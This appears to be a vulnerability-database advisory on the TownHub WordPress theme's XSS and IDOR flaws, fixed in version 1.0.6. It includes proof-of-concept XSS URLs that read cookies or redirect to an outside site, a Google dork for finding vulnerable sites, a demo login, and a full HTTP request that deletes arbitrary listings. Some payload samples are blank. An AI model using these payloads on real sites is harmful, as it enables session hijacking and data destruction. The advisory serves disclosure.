Lucene search

K
wpvulndbM0zeWPVDB-ID:08AADADE-9A4F-46E7-9F17-B2A33E6CB92B
HistoryJan 09, 2020 - 12:00 a.m.

TownHub < 1.0.6 - Multiple Vulnerabilities

2020-01-0900:00:00
m0ze
wpscan.com
9

0.009 Low

EPSS

Percentile

83.2%

Multiple vulnerabilities was discovered in the ‘TownHub - Directory & Listing WordPress Theme’, tested version — v1.0.2: - Unauthenticated XSS - Authenticated Persistent XSS - IDOR Edit (WPScanTeam): December 27h, 2019 - Envato Contacted January 5th, 2020 - Envato Investigating January 6th, 2020 - v1.0.6 released

PoC

-—[]- Info: -[]---- Demo website: https://townhub.cththemes.com/ Demo account: m0ze2/asdasd (login/password) PoC listing: https://townhub.cththemes.com/dashboard/?dashboard=listings Google Dork: /wp-content/themes/townhub/ Date: 27/12/2019 -—[]- Reflected XSS: -[]---- Input field with placeholder «What are you looking for?» on the homepage is vulnerable. Same thing with a regular search (block near website logo). Payload Sample #0: Payload Sample #1: PoC #0: https://townhub.cththemes.com/?search_term=<img+src%3Dx+onerror%3Dalert(document.cookie)>&amp;location;_search=&amp;nearby;=off&amp;address;_lat=&amp;address;_lng=&amp;distance;=10&amp;lcats;[]= PoC #1: https://townhub.cththemes.com/?search_term=<img+src%3Dx+onerror%3Dwindow.location%3D`https%3A%2F%2Fm0ze.ru`%3B>&amp;location;_search=&amp;nearby;=off&amp;address;_lat=&amp;address;_lng=&amp;distance;=10&amp;lcats;[]= -—[]- Persistent XSS -> Chat: -[]---- Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://townhub.cththemes.com/dashboard/?dashboard=chats or from chat widget on the bottom right corner). Payload Sample #0: Payload Sample #1: -—[]- Persistent XSS -> Listing page: -[]---- Add new listing here https://townhub.cththemes.com/submit-listing/#/ (first time you need to order a «Free» plan and go to this URL again). Vulnerable input fields: «Address», «Latitude (Drag marker on the map)», «Longitude (Drag marker on the map)», «Email Address», «Phone Number» and «Website». Payload inside «Address», «Latitude (Drag marker on the map)» and «Longitude (Drag marker on the map)» input fields also works on the admin dashboard, so it’s possible to steal administrator cookies. Payload Sample #0: "> Payload Sample #1: ">

Greetings from m0ze

Payload Sample #2: "> -—[]- IDOR: -[]---- Delete any post/page/listing: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: townhub.cththemes.com User-Agent: Mozilla/5.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 83 Origin: https://townhub.cththemes.com DNT: 1 Connection: close Referer: https://townhub.cththemes.com/dashboard/?dashboard=listings Cookie: your_cookies_here Pragma: no-cache Cache-Control: no-cache lid=XXXX&action;=townhub_addons_delete_listing&_nonce=3fb56225d8&_wpnonce=3fb56225d8 Where: lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for tag).

CPENameOperatorVersion
townhublt1.0.6

0.009 Low

EPSS

Percentile

83.2%

Related for WPVDB-ID:08AADADE-9A4F-46E7-9F17-B2A33E6CB92B